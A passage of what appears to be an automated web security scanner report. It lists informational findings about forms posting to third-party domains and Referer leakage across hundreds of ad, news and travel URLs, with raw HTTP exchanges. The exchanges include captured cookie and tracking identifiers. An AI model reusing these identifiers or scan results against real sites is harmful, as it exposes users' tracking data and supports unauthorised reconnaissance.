Server: Apache/2.0.63 (Red Hat)
X-Powered-By: PHP/5.2.9
Cache-Control: no-transform
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</p>
<form action="https://secure2.convio.net/neaq/site/CRConsAPI" method="post" name="convioform" class="request" id="convioform" style="margin-bottom: 0;">
<input type="hidden" name="api_key" id="convio_neaq" value="convio_neaq">
...[SNIP]...

16.13. http://www.techmynd.com/cross-site-scripting-attacks-xss/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techmynd.com
Path:	/cross-site-scripting-attacks-xss/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

email
button
uri
loc

Request

GET /cross-site-scripting-attacks-xss/ HTTP/1.1
Host: www.techmynd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.14. http://www.thefreedomtrail.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefreedomtrail.org
Path:	/

Issue detail

The page contains a form which POSTs data to the domain ui.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.thefreedomtrail.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 13511
Content-Type: text/html
Content-Location: http://www.thefreedomtrail.org/index.html
Last-Modified: Wed, 05 Jan 2011 21:58:55 GMT
Accept-Ranges: bytes
ETag: "9cdc17bf23adcb1:6b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 16:17:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="google-site-verification" content=
...[SNIP]...
</div>
<form name="signup" action="http://ui.constantcontact.com/d.jsp" target="_blank" method="post">
<input type="hidden" name="m" value="1101388664680">
...[SNIP]...

16.15. http://www.theroot.com/multimedia/50-years-black-history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The page contains a form which POSTs data to the domain theroot.us1.list-manage.com. The form contains the following fields:

Request

GET /multimedia/50-years-black-history?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.16. http://www.theroot.com/views/2011/young-futurists previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The page contains a form which POSTs data to the domain theroot.us1.list-manage.com. The form contains the following fields:

Request

GET /views/2011/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.17. http://www.theroot.com/views/meet-25-people-who-will-change-our-world previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The page contains a form which POSTs data to the domain theroot.us1.list-manage.com. The form contains the following fields:

Request

GET /views/meet-25-people-who-will-change-our-world?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17. Cross-domain Referer leakage previous next
There are 393 instances of this issue:

http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a.rad.msn.com/ADSAdClient31.dll
http://a0.twimg.com/a/1296609216/stylesheets/fronts.css
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js
http://acslinda.websitetoolbox.com/file
http://acslinda.websitetoolbox.com/file
http://acslinda.websitetoolbox.com/file
http://acslinda.websitetoolbox.com/file
http://acslinda.websitetoolbox.com/file
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24
http://ad.doubleclick.net/adi/N3285.google/B2343920.91
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5
http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5
http://ad.doubleclick.net/adi/dmd.ehow/computers
http://ad.doubleclick.net/adi/dmd.ehow/homepage
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.fitness/abs
http://ad.doubleclick.net/adj/ami.mf.home/
http://ad.doubleclick.net/adj/dmd.ehow/computers
http://ad.doubleclick.net/adj/dmd.ehow/gen
http://ad.doubleclick.net/adj/dmd.ehow/homepage
http://ad.doubleclick.net/adj/dmd.ehow/homepage
http://ad.harrenmedianetwork.com/st
http://ad.harrenmedianetwork.com/st
http://ad.reduxmedia.com/st
http://ad.scanmedios.com/st
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://adadvisor.net/adscores/g.js
https://blekko.com/join
https://blekko.com/login
http://blog.facebook.com/blog.php
http://boardreader.com/a/2mdn.net/x22
http://boardreader.com/affiliate/gagbanner.html
http://boardreader.com/domain/2mdn.net/x22
http://boardreader.com/domain/aol.com
http://boardreader.com/domain/cafemom.com
http://boardreader.com/domain/myegy.com
http://boardreader.com/domain/ratedesi.com
http://boardreader.com/domain/sherdog.net
http://boardreader.com/domain/ufc.com
http://boardreader.com/domain/websitetoolbox.com
http://boardreader.com/domain/worldmastiffforum.com
http://boardreader.com/index.php
http://businessonmain.msn.com/browseresources/articles/firststeps.aspx
http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx
http://businessonmain.msn.com/questions/default.aspx
http://businessonmain.msn.com/videos/coolrunnings.aspx
http://can.monster.com/cookie-technology.aspx
http://ccc01.opinionlab.com/o.asp
http://cms.ad.yieldmanager.net/v1/cms
http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz
http://dating.msn.com/index.aspx
http://dating.msn.com/search/index.aspx
http://dating.msn.com/search/index.aspx
http://developers.facebook.com/
http://docs.google.com/viewer
http://entertainment.msn.com/news/
http://entertainment.msn.com/video/
http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success
https://gc.synxis.com/XBE/Popups/InfoPopup.aspx
https://gc.synxis.com/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
http://glo.msn.com/living/celebrity-home-collections-6350.gallery
http://gocitykids.parentsconnect.com/data/service-calendar.json
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://groups.google.com/groups
http://groups.google.com/groups
http://health.msn.com/health-topics/quit-smoking/articlepage.aspx
http://investing.money.msn.com/investments/stock-price
http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx
http://lifestyle.msn.com/relationships/your-money-today/article.aspx
http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx
http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx
http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx
http://local.msn.com/hourly.aspx
http://local.msn.com/movies-events.aspx
http://local.msn.com/news.aspx
http://local.msn.com/sports.aspx
http://local.msn.com/ten-day.aspx
http://local.msn.com/weather.aspx
http://local.msn.com/weather.aspx
http://login.live.com/login.srf
https://login.live.com/login.srf
https://login.live.com/login.srf
http://maps.google.com/local_url
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps/place
http://maps.google.com/maps/place
http://maps.google.com/maps/place
http://movies.msn.com/movies/article.aspx
http://music.msn.com/music/article.aspx
https://my.omniture.com/p/suite/1.2/index.html
http://picasaweb.google.com/lh/view
https://picasaweb.google.com/lh/view
http://pingomatic.com/ping/
https://publish.omniture.com/center/util/
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://rad.msn.com/ADSAdClient31.dll
http://realestate.msn.com/slideshow.aspx
http://scholar.google.com/scholar
http://scholar.google.com/scholar
http://search.twitter.com/search
https://secure.avangate.com/order/checkout.php
https://secure.opinionlab.com/ccc01/o.asp
http://seg.sharethis.com/getSegment.php
http://seg.sharethis.com/getSegment.php
http://seg.sharethis.com/getSegment.php
http://seg.sharethis.com/getSegment.php
https://sitesearch.omniture.com/center/util/
http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx
http://sociallist.org/submit.php
http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx
http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx
http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx
http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx
http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx
http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx
http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx
http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx
http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx
http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx
http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx
http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx
http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx
http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx
http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx
http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx
http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx
http://specials.msn.com/IEIncreaseFont_preview.aspx
http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar
http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing
http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/
http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/
http://translate.google.com/translate_t
http://translate.google.com/translate_t
http://tv.msn.com/last-night-on-tv/
http://tv.msn.com/tv/article.aspx
http://twitter.com/
http://twitter.com/newtwitter
http://twitter.com/search
http://twitter.com/search
http://twitter.com/search
http://twitter.com/search
http://twitter.com/share
http://webcache.googleusercontent.com/search
http://wonderwall.msn.com/movies/best-actor-nominees-2011-11135.gallery
http://wonderwall.msn.com/movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story
http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://www.addthis.com/bookmark.php
http://www.astaro.com/newsletter
http://www.astaro.com/sites/all/modules/images/lightbox2/js/lightbox_video.js
http://www.autocheck.com/
http://www.bing.com/
http://www.bing.com/images/results.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/news/search
http://www.bing.com/news/search
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/airline-ticket-deals.do
http://www.bing.com/videos/browse
http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j
http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj
http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k
http://www.demandstudios.com/ehow-writers.html
http://www.ehow.com/MailingList.html
http://www.ehow.com/MailingList.html
http://www.ehow.com/account/facebook_merge.aspx
http://www.ehow.com/account/simple_login.aspx
http://www.ehow.com/account/simple_register.aspx
http://www.everydaylifestyles.com/articles3.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/careers/
http://www.facebook.com/help/
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.google.com/advanced_search
http://www.google.com/coop/profile
http://www.google.com/finance
http://www.google.com/finance
http://www.google.com/finance
http://www.google.com/finance
http://www.google.com/finance
http://www.google.com/ig/adde
http://www.google.com/images
http://www.google.com/images
http://www.google.com/language_tools
http://www.google.com/preferences
http://www.google.com/quality_form
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/support/chrome/bin/answer.py
http://www.google.com/support/websearch/bin/answer.py
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/webhp
http://www.invisionpower.com/index.php
http://www.kampyle.com/
http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js
http://www.macromedia.com/shockwave/download/index.cgi
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136
http://www.msn.com/
http://www.msn.com/
http://www.msn.com/scp/AuthServiceFacebook.aspx
http://www.msn.com/scp/AuthServiceFacebookLogOff.aspx
http://www.msn.com/scp/AuthServiceTwitter.aspx
http://www.msnbc.msn.com/id/21134540/vp/41348830
http://www.msnbc.msn.com/id/21134540/vp/41365925
http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/
http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/
http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar
http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/
http://www.msnbc.msn.com/id/41359879/ns/us_news-life/
http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/
http://www.msnbc.msn.com/id/41365053/ns/weather/
http://www.omniture.com/en/privacy/2o7
http://www.omniture.com/en/product_tours/form
http://www.omniture.com/offer/100
http://www.omniture.com/offer/101
http://www.omniture.com/offer/102
http://www.omniture.com/offer/107
http://www.omniture.com/offer/108
http://www.omniture.com/offer/17
http://www.omniture.com/offer/170
http://www.omniture.com/offer/186
http://www.omniture.com/offer/187
http://www.omniture.com/offer/191
http://www.omniture.com/offer/285
http://www.omniture.com/offer/286
http://www.omniture.com/offer/303
http://www.omniture.com/offer/323
http://www.omniture.com/offer/335
http://www.omniture.com/offer/337
http://www.omniture.com/offer/372
http://www.omniture.com/offer/411
http://www.omniture.com/offer/412
http://www.omniture.com/offer/413
http://www.omniture.com/offer/427
http://www.omniture.com/offer/435
http://www.omniture.com/offer/462
http://www.omniture.com/offer/892
http://www.orbitz.com/
http://www.orbitz.com/App/DPTLandingPageSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/InitDealEdit
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PrepareActivitiesHome
http://www.orbitz.com/App/PrepareDealsHome
http://www.orbitz.com/App/PrepareFlightsTab
http://www.orbitz.com/App/PrepareVacationsHome
http://www.orbitz.com/App/Sitemap
http://www.orbitz.com/App/SubmitQuickSearch
http://www.orbitz.com/App/ViewRSSHelpPage
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/hotels/
http://www.orbitz.com/hotels/
http://www.orbitz.com/hotels/
http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/adserverProxy.jsp
http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp
http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp
http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp
http://www.orbitz.com/shop/hotelsearch
http://www.orbitz.com/shop/hotelsearch
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/account/login
https://www.orbitz.com/trips/writeReview
http://www.plentyoffish.com/
http://www.plentyoffish.com/siteopt.js
http://www.stocktrader.org.uk/remote2/ST1-2.php
http://www.theroot.com/multimedia/50-years-black-history
http://www.theroot.com/views/2011/young-futurists
http://www.theroot.com/views/meet-25-people-who-will-change-our-world
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.threatexpert.com/report.aspx
http://www.threatexpert.com/reports.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVXTA&AP=1440 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1298
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8305954-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:46:50 GMT
Content-Length: 1298

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1686997.1?!&&PID=8305954&UIT=G&TargetID=30580561&AN=1392708374&PG=INVXTA">$7 Online
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

17.2. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN3&AP=1090

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2;sz=160x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=;ord=1344882713?

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2759
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC09=FB=AgEAaA5VvUAB; expires=Tue, 05-Feb-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8084873-T38284301-C83000000000033436
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 06 Feb 2011 14:17:32 GMT
Content-Length: 2759

//<![CDATA[
function getRADIds() { return{"adid":"83000000000033436","pid":"8084873","targetid":"38284301"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 600);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1344882713() {var adCode_1344882713=new Array();adCode_1344882713.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2;sz=160x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/83000000000033436.1?!&&PID=8084873&UIT=G&TargetID=38284301&AN=1344882713&PG=SPTSN3&ASID=c40951acad93491c9551811a6cfa3627&destination=;ord=1344882713?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1344882713.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.msn.com/B5114832.2;abr=!ie;sz=160x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/G
...[SNIP]...

17.3. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1296
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:48:13 GMT
Content-Length: 1296

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1686997.1?!&&PID=8282372&UIT=G&TargetID=30580561&AN=822821502&PG=INVXTA">$7 Online S
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

17.4. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVXTA&AP=1440

The response contains the following link to another domain:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVXTA&AP=1440 HTTP/1.1
